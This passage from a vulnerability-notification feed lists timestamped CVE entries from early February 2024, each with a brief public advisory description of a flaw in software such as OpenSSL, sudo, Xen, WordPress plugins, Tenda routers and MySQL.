These locationsinclude the PEM_read_bio_TYPE() functions as well as the decoders introduced inOpenSSL 3.0.The OpenSSL asn1parse command line application is also impacted by this issue.🎖@cveNotify |
|
| 2024-02-04 09:37:25 |
🚨 CVE-2022-39046An issue was discovered in the GNU C Library (glibc) 2.36. When the syslog function is passed a crafted input string larger than 1024 bytes, it reads uninitialized memory from the heap and prints it to the target log file, potentially revealing a portion of the contents of the heap.🎖@cveNotify |
|
| 2024-02-04 09:37:24 |
🚨 CVE-2021-3156Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.🎖@cveNotify |
|
| 2024-02-04 08:37:43 |
🚨 CVE-2022-33747Arm: unbounded memory consumption for 2nd-level page tables Certain actions require e.g. removing pages from a guest's P2M (Physical-to-Machine) mapping. When large pages are in use to map guest pages in the 2nd-stage page tables, such a removal operation may incur a memory allocation (to replace a large mapping with individual smaller ones). These memory allocations are taken from the global memory pool. A malicious guest might be able to cause the global memory pool to be exhausted by manipulating its own P2M mappings.🎖@cveNotify |
|
| 2024-02-04 08:37:42 |
🚨 CVE-2022-23825Aliases in the branch predictor may cause some AMD processors to predict the wrong branch type potentially leading to information disclosure.🎖@cveNotify |
|
| 2024-02-04 08:37:38 |
🚨 CVE-2022-29900Mis-trained branch predictions for return instructions may allow arbitrary speculative code execution under certain microarchitecture-dependent conditions.🎖@cveNotify |
|
| 2024-02-04 08:37:37 |
🚨 CVE-2022-26360IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption.🎖@cveNotify |
|
| 2024-02-04 08:37:36 |
🚨 CVE-2022-26359IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption.🎖@cveNotify |
|
| 2024-02-04 08:37:32 |
🚨 CVE-2022-26357race in VT-d domain ID cleanup Xen domain IDs are up to 15 bits wide. VT-d hardware may allow for only less than 15 bits to hold a domain ID associating a physical device with a particular domain. Therefore internally Xen domain IDs are mapped to the smaller value range. The cleaning up of the housekeeping structures has a race, allowing for VT-d domain IDs to be leaked and flushes to be bypassed.🎖@cveNotify |
|
| 2024-02-04 08:37:31 |
🚨 CVE-2021-28709issues with partially successful P2M updates on x86 T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages). In some cases the hypervisor carries out the requests by splitting them into smaller chunks. Error handling in certain PoD cases has been insufficient in that in particular partial success of some operations was not properly accounted for. There are two code paths affected - page removal (CVE-2021-28705) and insertion of new pages (CVE-2021-28709). (We provide one patch which combines the fix to both issues.)🎖@cveNotify |
|
| 2024-02-04 08:37:26 |
🚨 CVE-2021-28707PoD operations on misaligned GFNs T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages). The implementation of some of these hypercalls for PoD does not enforce the base page frame number to be suitably aligned for the specified order, yet some code involved in PoD handling actually makes such an assumption. These operations are XENMEM_decrease_reservation (CVE-2021-28704) and XENMEM_populate_physmap (CVE-2021-28707), the latter usable only by domains controlling the guest, i.e. a de-privileged qemu or a stub domain. (Patch 1, combining the fix to both these two issues.) In addition handling of XENMEM_decrease_reservation can also trigger a host crash when the specified page order is neither 4k nor 2M nor 1G (CVE-2021-28708, patch 2).🎖@cveNotify |
|
| 2024-02-04 08:37:25 |
🚨 CVE-2021-28704PoD operations on misaligned GFNs T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] x86 HVM and PVH guests may be started in populate-on-demand (PoD) mode, to provide a way for them to later easily have more memory assigned. Guests are permitted to control certain P2M aspects of individual pages via hypercalls. These hypercalls may act on ranges of pages specified via page orders (resulting in a power-of-2 number of pages). The implementation of some of these hypercalls for PoD does not enforce the base page frame number to be suitably aligned for the specified order, yet some code involved in PoD handling actually makes such an assumption. These operations are XENMEM_decrease_reservation (CVE-2021-28704) and XENMEM_populate_physmap (CVE-2021-28707), the latter usable only by domains controlling the guest, i.e. a de-privileged qemu or a stub domain. (Patch 1, combining the fix to both these two issues.) In addition handling of XENMEM_decrease_reservation can also trigger a host crash when the specified page order is neither 4k nor 2M nor 1G (CVE-2021-28708, patch 2).🎖@cveNotify |
|
| 2024-02-04 06:37:24 |
🚨 CVE-2019-25159A vulnerability was found in mpedraza2020 Intranet del Monterroso up to 4.50.0. It has been classified as critical. This affects an unknown part of the file config/cargos.php. The manipulation of the argument dni_profe leads to sql injection. Upgrading to version 4.51.0 is able to address this issue. The identifier of the patch is 678190bee1dfd64b54a2b0e88abfd009e78adce8. It is recommended to upgrade the affected component. The identifier VDB-252717 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-04 05:37:24 |
🚨 CVE-2015-10129A vulnerability was found in planet-freo up to 20150116 and classified as problematic. Affected by this issue is some unknown functionality of the file admin/inc/auth.inc.php. The manipulation of the argument auth leads to incorrect comparison. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 6ad38c58a45642eb8c7844e2f272ef199f59550d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-252716.🎖@cveNotify |
|
| 2024-02-04 01:37:25 |
🚨 CVE-2023-50947IBM Business Automation Workflow 22.0.2, 23.0.1, and 23.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 275665.🎖@cveNotify |
|
| 2024-02-04 01:37:24 |
🚨 CVE-2023-33851IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1020.00 through FW1020.40, and FW1030.00 through FW1030.30 could reveal sensitive partition data to a system administrator. IBM X-Force ID: 257135.🎖@cveNotify |
|
| 2024-02-03 19:37:24 |
🚨 CVE-2024-23301Relax-and-Recover (aka ReaR) through 2.7 creates a world-readable initrd when using GRUB_RESCUE=y. This allows local attackers to gain access to system secrets otherwise only readable by root.🎖@cveNotify |
|
| 2024-02-03 16:37:24 |
🚨 CVE-2024-1215A vulnerability was found in SourceCodester CRUD without Page Reload 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file fetch_data.php. The manipulation of the argument username/city leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252782 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-03 14:37:24 |
🚨 CVE-2024-0853curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer tothe same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check.🎖@cveNotify |
|
| 2024-02-03 11:37:25 |
🚨 CVE-2023-28487Sudo before 1.9.13 does not escape control characters in sudoreplay output.🎖@cveNotify |
|
| 2024-02-03 11:37:24 |
🚨 CVE-2023-28486Sudo before 1.9.13 does not escape control characters in log messages.🎖@cveNotify |
|
| 2024-02-03 09:37:44 |
🚨 CVE-2024-1064A host header injection vulnerability in the HTTP handler component of Crafty Controller allows a remote, unauthenticated attacker to trigger a Denial of Service (DoS) condition via a modified host header🎖@cveNotify |
|
| 2024-02-03 09:37:43 |
🚨 CVE-2023-44031Incorrect access control in Reprise License Management Software Reprise License Manager v15.1 allows attackers to arbitrarily save sensitive files in insecure locations via a crafted POST request.🎖@cveNotify |
|
| 2024-02-03 09:37:42 |
🚨 CVE-2023-38174Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-02-03 09:37:37 |
🚨 CVE-2023-35618Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-03 09:37:36 |
🚨 CVE-2023-36029Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-02-03 09:37:31 |
🚨 CVE-2023-36559Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-02-03 09:37:30 |
🚨 CVE-2023-36562Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-03 09:37:26 |
🚨 CVE-2023-36787Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-03 09:37:25 |
🚨 CVE-2023-29345Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-02-03 09:37:24 |
🚨 CVE-2023-33143Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-03 07:37:25 |
🚨 CVE-2020-28049An issue was discovered in SDDM before 0.19.0. It incorrectly starts the X server in a way that - for a short time period - allows local unprivileged users to create a connection to the X server without providing proper authentication. A local attacker can thus access X server display contents and, for example, intercept keystrokes or access the clipboard. This is caused by a race condition during Xauthority file creation.🎖@cveNotify |
|
| 2024-02-03 07:37:24 |
🚨 CVE-2020-27619In Python 3 through 3.9.0, the Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP.🎖@cveNotify |
|
| 2024-02-03 06:37:25 |
🚨 CVE-2024-0909The Anonymous Restricted Content plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.6.2. This is due to insufficient restrictions through the REST API on the posts/pages that protections are being place on. This makes it possible for unauthenticated attackers to access protected content.🎖@cveNotify |
|
| 2024-02-03 06:37:24 |
🚨 CVE-2023-37528A cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform can possibly allow an attack to exploit an application parameter during execution of the Save Report.🎖@cveNotify |
|
| 2024-02-03 03:37:26 |
🚨 CVE-2021-33631Integer Overflow or Wraparound vulnerability in openEuler kernel on Linux (filesystem modules) allows Forced Integer Overflow.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3, from 5.10.0-60.18.0 before 5.10.0-183.0.0.🎖@cveNotify |
|
| 2024-02-03 03:37:25 |
🚨 CVE-2021-40247SQL injection vulnerability in Sourcecodester Budget and Expense Tracker System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username field.🎖@cveNotify |
|
| 2024-02-03 03:37:24 |
🚨 CVE-2021-41645Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field. .🎖@cveNotify |
|
| 2024-02-03 02:37:38 |
🚨 CVE-2023-2156A flaw was found in the networking subsystem of the Linux kernel within the handling of the RPL protocol. This issue results from the lack of proper handling of user-supplied data, which can lead to an assertion failure. This may allow an unauthenticated remote attacker to create a denial of service condition on the system.🎖@cveNotify |
|
| 2024-02-03 02:37:32 |
🚨 CVE-2019-15118check_input_term in sound/usb/mixer.c in the Linux kernel through 5.2.9 mishandles recursion, leading to kernel stack exhaustion.🎖@cveNotify |
|
| 2024-02-03 02:37:31 |
🚨 CVE-2010-0302Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS before 1.4.4, when kqueue or epoll is used, allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-3553.🎖@cveNotify |
|
| 2024-02-03 02:37:30 |
🚨 CVE-2010-0378Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a "Movie Unloading Vulnerability."🎖@cveNotify |
|
| 2024-02-03 02:37:26 |
🚨 CVE-2008-0077Use-after-free vulnerability in Microsoft Internet Explorer 6 SP1, 6 SP2, and and 7 allows remote attackers to execute arbitrary code by assigning malformed values to certain properties, as demonstrated using the by property of an animateMotion SVG element, aka "Property Memory Corruption Vulnerability."🎖@cveNotify |
|
| 2024-02-03 02:37:25 |
🚨 CVE-2002-0671Pingtel xpressa SIP-based voice-over-IP phone 1.2.5 through 1.2.7.4 downloads phone applications from a web site but can not verify the integrity of the applications, which could allow remote attackers to install Trojan horse applications via DNS spoofing.🎖@cveNotify |
|
| 2024-02-03 02:07:25 |
🚨 CVE-2023-6291A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.🎖@cveNotify |
|
| 2024-02-03 02:07:24 |
🚨 CVE-2023-45105URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SERVIT Software Solutions affiliate-toolkit – WordPress Affiliate Plugin.This issue affects affiliate-toolkit – WordPress Affiliate Plugin: from n/a through 3.3.9.🎖@cveNotify |
|
| 2024-02-03 01:37:32 |
🚨 CVE-2023-6389The WordPress Toolbar WordPress plugin through 2.2.6 redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.🎖@cveNotify |
|
| 2024-02-03 01:37:25 |
🚨 CVE-2023-5956The Wp-Adv-Quiz WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-02-03 01:37:24 |
🚨 CVE-2023-3181The C:\Program Files (x86)\Splashtop\Splashtop Software Updater\uninst.exe process creates a folder at C:\Windows\Temp~nsu.tmp and copies itself to it as Au_.exe. The C:\Windows\Temp~nsu.tmp\Au_.exe file is automatically launched as SYSTEM when the system reboots or when a standard user runs an MSI repair using Splashtop Streamer’s Windows Installer. Since the C:\Windows\Temp~nsu.tmp folder inherits permissions from C:\Windows\Temp and Au_.exe is susceptible to DLL hijacking, standard users can write a malicious DLL to it and elevate their privileges.🎖@cveNotify |
|
| 2024-02-03 01:07:32 |
🚨 CVE-2023-52188Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Russell Jamieson Footer Putter allows Stored XSS.This issue affects Footer Putter: from n/a through 1.17.🎖@cveNotify |
|
| 2024-02-03 01:07:26 |
🚨 CVE-2024-1117A vulnerability was found in openBI up to 1.0.8. It has been declared as critical. Affected by this vulnerability is the function index of the file /application/index/controller/Screen.php. The manipulation of the argument fileurl leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252475.🎖@cveNotify |
|
| 2024-02-03 01:07:25 |
🚨 CVE-2024-1114A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function dlfile of the file /application/index/controller/Screen.php. The manipulation of the argument fileUrl leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252472.🎖@cveNotify |
|
| 2024-02-03 01:07:24 |
🚨 CVE-2024-1113A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadUnity of the file /application/index/controller/Unity.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252471.🎖@cveNotify |
|
| 2024-02-03 00:37:33 |
🚨 CVE-2023-7074The WP SOCIAL BOOKMARK MENU WordPress plugin through 1.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.🎖@cveNotify |
|
| 2024-02-03 00:37:26 |
🚨 CVE-2023-6390The WordPress Users WordPress plugin through 1.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.🎖@cveNotify |
|
| 2024-02-03 00:37:25 |
🚨 CVE-2021-33630NULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation. This vulnerability is associated with program files net/sched/sch_cbs.C.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3.🎖@cveNotify |
|
| 2024-02-03 00:07:30 |
🚨 CVE-2023-6633The Site Notes WordPress plugin through 2.0.0 does not have CSRF checks in some of its functionalities, which could allow attackers to make logged in users perform unwanted actions, such as deleting administration notes, via CSRF attacks🎖@cveNotify |
|
| 2024-02-03 00:07:26 |
🚨 CVE-2023-6391The Custom User CSS WordPress plugin through 0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.🎖@cveNotify |
|
| 2024-02-03 00:07:25 |
🚨 CVE-2024-22860Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder.🎖@cveNotify |
|
| 2024-02-02 23:37:32 |
🚨 CVE-2024-1197A vulnerability, which was classified as critical, has been found in SourceCodester Testimonial Page Manager 1.0. This issue affects some unknown processing of the file delete-testimonial.php of the component HTTP GET Request Handler. The manipulation of the argument testimony leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-252695.🎖@cveNotify |
|
| 2024-02-02 23:37:25 |
🚨 CVE-2024-24136The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks.🎖@cveNotify |
|
| 2024-02-02 23:37:24 |
🚨 CVE-2024-22570A stored cross-site scripting (XSS) vulnerability in /install.php?m=install&c=index&a=step3 of GreenCMS v2.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2024-02-02 22:37:25 |
🚨 CVE-2024-1196A vulnerability classified as problematic was found in SourceCodester Testimonial Page Manager 1.0. This vulnerability affects unknown code of the file add-testimonial.php of the component HTTP POST Request Handler. The manipulation of the argument name/description/testimony leads to cross site scripting. The attack can be initiated remotely. VDB-252694 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-02 22:37:24 |
🚨 CVE-2024-1195A vulnerability classified as critical was found in iTop VPN up to 4.0.0.1. Affected by this vulnerability is an unknown functionality in the library ITopVpnCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The identifier VDB-252685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-02 21:37:32 |
🚨 CVE-2023-37527A reflected cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform can possibly allow an attacker to execute malicious javascript code in the application session or in database, via remote injection, while rendering content in a web page.🎖@cveNotify |
|
| 2024-02-02 21:37:25 |
🚨 CVE-2024-23635AntiSamy is a library for performing fast, configurable cleansing of HTML coming from untrusted sources. Prior to 1.7.5, there is a potential for a mutation XSS (mXSS) vulnerability in AntiSamy caused by flawed parsing of the HTML being sanitized. To be subject to this vulnerability the `preserveComments` directive must be enabled in your policy file. As a result, certain crafty inputs can result in elements in comment tags being interpreted as executable when using AntiSamy's sanitized output. Patched in AntiSamy 1.7.5 and later.🎖@cveNotify |
|
| 2024-02-02 21:37:24 |
🚨 CVE-2024-1186A vulnerability classified as problematic was found in Munsoft Easy Archive Recovery 2.0. This vulnerability affects unknown code of the component Registration Key Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252676. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-02 21:07:26 |
🚨 CVE-2024-0918A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-02 21:07:25 |
🚨 CVE-2024-22545An issue was discovered in TRENDnet TEW-824DRU version 1.04b01, allows local unauthenticated attackers to execute arbitrary code via the system.ntp.server parameter in the sub_420AE0() function.🎖@cveNotify |
|
| 2024-02-02 20:07:25 |
🚨 CVE-2024-0890A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-252042 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-02 20:07:24 |
🚨 CVE-2024-0889A vulnerability was found in Kmint21 Golden FTP Server 2.02b and classified as problematic. This issue affects some unknown processing of the component PASV Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252041 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-02 18:37:32 |
🚨 CVE-2024-1188A vulnerability, which was classified as problematic, was found in Rizone Soft Notepad3 1.0.2.350. Affected is an unknown function of the component Encryption Passphrase Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-252678 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-02 18:37:25 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-02-02 18:37:24 |
🚨 CVE-2007-1923(1) LedgerSMB and (2) DWS Systems SQL-Ledger implement access control lists by changing the set of URLs linked from menus, which allows remote attackers to access restricted functionality via direct requests. The LedgerSMB affected versions are before 1.3.0.🎖@cveNotify |
|
| 2024-02-02 18:07:32 |
🚨 CVE-2024-0926A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This issue affects the function formWifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252131. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-02 18:07:26 |
🚨 CVE-2024-0925A vulnerability has been found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This vulnerability affects the function formSetVirtualSer. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-02 18:07:25 |
🚨 CVE-2024-20967Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).🎖@cveNotify |
|
| 2024-02-02 18:07:24 |
🚨 CVE-2024-20965Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-02-02 17:07:32 |
🚨 CVE-2008-0379Race condition in the Enterprise Tree ActiveX control (EnterpriseControls.dll 11.5.0.313) in Crystal Reports XI Release 2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the SelectedSession method, which triggers a buffer overflow.🎖@cveNotify |
|
| 2024-02-02 17:07:26 |
🚨 CVE-2007-3970Race condition in ESET NOD32 Antivirus before 2.2289 allows remote attackers to execute arbitrary code via a crafted CAB file, which triggers heap corruption.🎖@cveNotify |
|
| 2024-02-02 17:07:25 |
🚨 CVE-2005-0252SQL injection vulnerability in BibORB 1.3.2, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the (1) Username or (2) Password.🎖@cveNotify |
|
| 2024-02-02 17:07:24 |
🚨 CVE-2005-0251Cross-site scripting (XSS) vulnerability in bibindex.php for BibORB 1.3.2, and possibly earlier versions, allows remote attackers to inject arbitrary HTML and web script via the search parameter.🎖@cveNotify |
|
| 2024-02-02 16:37:32 |
🚨 CVE-2020-35166Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain an Observable Timing Discrepancy Vulnerability.🎖@cveNotify |
|
| 2024-02-02 16:37:31 |
🚨 CVE-2010-2941ipp.c in cupsd in CUPS 1.4.4 and earlier does not properly allocate memory for attribute values with invalid string data types, which allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly execute arbitrary code via a crafted IPP request.🎖@cveNotify |
|
| 2024-02-02 16:37:30 |
🚨 CVE-2010-1772Use-after-free vulnerability in page/Geolocation.cpp in WebCore in WebKit before r59859, as used in Google Chrome before 5.0.375.70, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site, related to failure to stop timers associated with geolocation upon deletion of a document.🎖@cveNotify |
|
| 2024-02-02 16:37:26 |
🚨 CVE-2009-0023The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.🎖@cveNotify |
|
| 2024-02-02 16:37:25 |
🚨 CVE-2004-0977The make_oidjoins_check script in PostgreSQL 7.4.5 and earlier allows local users to overwrite files via a symlink attack on temporary files.🎖@cveNotify |
|
| 2024-02-02 16:07:46 |
🚨 CVE-2024-0986A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-02 16:07:45 |
🚨 CVE-2024-0841A null pointer dereference flaw was found in the hugetlbfs_fill_super function in the Linux kernel hugetlbfs (HugeTLB pages) functionality. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-02-02 16:07:44 |
🚨 CVE-2024-0727Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSLto crash leading to a potential Denial of Service attackImpact summary: Applications loading files in the PKCS12 format from untrustedsources might terminate abruptly.A file in PKCS12 format can contain certificates and keys and may come from anuntrusted source. The PKCS12 specification allows certain fields to be NULL, butOpenSSL does not correctly check for this case. This can lead to a NULL pointerdereference that results in OpenSSL crashing. If an application processes PKCS12files from an untrusted source using the OpenSSL APIs then that application willbe vulnerable to this issue.OpenSSL APIs that are vulnerable to this are: PKCS12_parse(),PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()and PKCS12_newpass().We have also fixed a similar issue in SMIME_write_PKCS7(). However since thisfunction is related to writing data we do not consider it security significant.The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.🎖@cveNotify |
|
| 2024-02-02 16:07:40 |
🚨 CVE-2023-38323An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the status path script entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.🎖@cveNotify |
|
| 2024-02-02 16:07:39 |
🚨 CVE-2023-38318An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the gateway FQDN entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.🎖@cveNotify |
|
| 2024-02-02 16:07:38 |
🚨 CVE-2023-38317An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the network interface name entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.🎖@cveNotify |
|
| 2024-02-02 16:07:35 |
